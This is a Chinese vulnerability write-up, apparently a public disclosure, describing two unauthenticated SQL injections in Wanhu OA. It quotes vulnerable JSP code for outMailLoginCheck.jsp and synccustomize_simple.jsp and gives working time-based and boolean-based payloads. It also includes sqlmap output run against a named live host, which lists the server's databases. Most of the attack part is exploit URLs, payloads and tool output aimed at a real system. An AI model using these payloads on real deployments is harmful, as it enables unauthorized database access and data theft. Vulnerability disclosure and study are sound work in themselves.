万户OA两处盲注DBA权限（无需登陆）
一处是布尔型盲注，适用万户OA标准版
一处是延时盲注，通杀标准版和专业版

先说通杀标准版和专业版的延时盲注。

注入点：

/defaultroot/outMailLoginCheck.jsp
 

<%@ page contentType="text/html; charset=GBK"%>
<%
//盾安外部邮件登陆检查
com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase();
try{
    java.sql.Connection conn = dsb.getDataSource().getConnection();
    java.sql.Statement stmt = conn.createStatement();
    java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'");
    if(rs.next()){
        out.print(true);
    }else{
        out.print(false);
    }
    conn.close();
}catch(Exception e){}
%>

一看就知道盲注，在OA_MAILLOGIN表默认为空的情况就只有比较慢的延时盲注了，直接指定sqlmap的technique=T。

先试试标准版的

http://oa.frjt.net:8081/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=
 

sqlmap identified the following injection points with a total of 125 HTTP(s) requests:
---
Place: GET
Parameter: userAccount
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom=
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0

再试试专业版的
 

漏洞证明：

再就是布尔型盲注了，这个只有标准版有。

/defaultroot/synccustomize_simple.jsp
 

<%
   String flag=request.getParameter("flag");
   String menuname = request.getParameter("menuname");
   if("sync".equals(flag)){
      //数据
  String s_String = "";
  int s_int = 0;

      String[][]  res = null;
  DbOpt dbopt = null;

      try {

  dbopt = new DbOpt();
  String Sql = "";

  Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname  from OA_MENUSET where menuname='"+menuname+"' ";

  res = dbopt.executeQueryToStrArr2(Sql,18);

  if(res != null){

                     String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");
 s_int = Integer.parseInt(_cnt);
.......
 }else if(s_int>1){
   s_String = "查出"+s_int+"条数据，未处理！";
 }
  }
  
  dbopt.close();

} catch (Exception e) {
    e.printStackTrace();
} finally {
    try {
        dbopt.close();
    } catch (SQLException ex) {
    }
}
  %>
</table>

<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">

 <tr>
    <td><%=s_String%>&nbsp;</td>

这里就可以用布尔型盲注，多开点线程速度就妥妥的了。验证：

http://oa.frjt.net:8081/defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B
 

web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: menuname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] ezoffice
[*] information_schema
[*] mysql